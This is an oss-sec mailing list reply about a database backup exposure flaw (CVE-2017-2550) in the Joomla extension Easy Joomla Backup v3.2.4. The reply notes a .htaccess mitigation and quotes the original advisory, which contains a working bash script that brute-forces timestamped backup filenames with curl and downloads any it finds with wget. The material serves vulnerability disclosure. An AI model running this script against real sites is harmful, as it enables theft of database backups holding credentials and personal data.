oss-sec mailing list archives
Re: Joomla extension Easy Joomla Backup v3.2.4 database backup exposure
From: David Jardin <david.jardin () community joomla org>
Date: Thu, 28 Sep 2017 15:09:11 +0200
It’s worth to mention that the extension has a default .htaccess file with a „deny from all“ in the backup directory, that will mitigate the described attack on pretty much any standard shared-hosting platform that I’m aware of. Am 28. September 2017 um 14:37:20, Larry W. Cashdollar (larry0 () me com) schrieb: Title: Joomla extension Easy Joomla Backup v3.2.4 database backup exposure Author: Larry W. Cashdollar, @_larry0 Date: 2017-09-07 CVE-ID:[CVE-2017-2550] Download Site: https://joomla-extensions.kubik-rubik.de/ejb-easy-joomla-backup Vendor: kubik-rubik Vendor Notified: 2017-09-07 Vendor Contact: Advisory: http://www.vapidlabs.com/advisory.php?v=200 Description: Easy Joomla Backup creates 'old-school' backups without any frills. Vulnerability: The software creates a copy of the backup in the web root. The file name is easily guessable as it's just a time stamp: http://example.com/administrator/components/com_easyjoomlabackup/backups/DOMAIN_YEAR-MONTH-DAY_H-M-S.zip Exploit Code: • #!/bin/bash • #Larry W. Cashdollar, @_larry0 9/7/2017 • #Bruteforce download backups for Joomla Extension Easy Joomla Backup v3.2.4 • #https://joomla-extensions.kubik-rubik.de/ejb-easy-joomla-backup • MONTH=09 • DAY=07 • YEAR=2017 • Z=0 • #May need to set the DOMAIN to $1 the target depending on how WP is configured. • DOMAIN=192.168.0.163 • • echo "Scanning website for available backups:" • for y in `seq -w 0 23`; do • for x in `seq -w 0 59`; do • Y=`echo "scale=2;($Z/86000)*100"|bc`; • echo -ne "\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b$CPATH $Y%" • for z in `seq -w 0 59`; do • Z=$(( $Z + 1 )); • CPATH="http://$1/administrator/components/com_easyjoomlabackup/backups/"$DOMAIN"_"$YEAR"-"$MONTH"-"$DAY"_"$y"-"$x"-"$z".zip";; • RESULT=`curl -s --head $CPATH|grep 200`; • if [ -n "$RESULT" ]; then • echo "" • echo "[+] Location $CPATH Found"; • echo "[+] Received $RESULT"; • echo "Downloading......"; • wget $CPATH • fi; • done • done • done • echo "Completed." -- Kind Regards, David Jardin
Attachment:
signature.asc
Description: Message signed with OpenPGP using AMPGpg
Current thread:
- Joomla extension Easy Joomla Backup v3.2.4 database backup exposure Larry W. Cashdollar (Sep 28)
- Re: Joomla extension Easy Joomla Backup v3.2.4 database backup exposure David Jardin (Sep 28)
- Re: Joomla extension Easy Joomla Backup v3.2.4 database backup exposure Larry W. Cashdollar (Sep 28)
- Re: Joomla extension Easy Joomla Backup v3.2.4 database backup exposure David Jardin (Sep 28)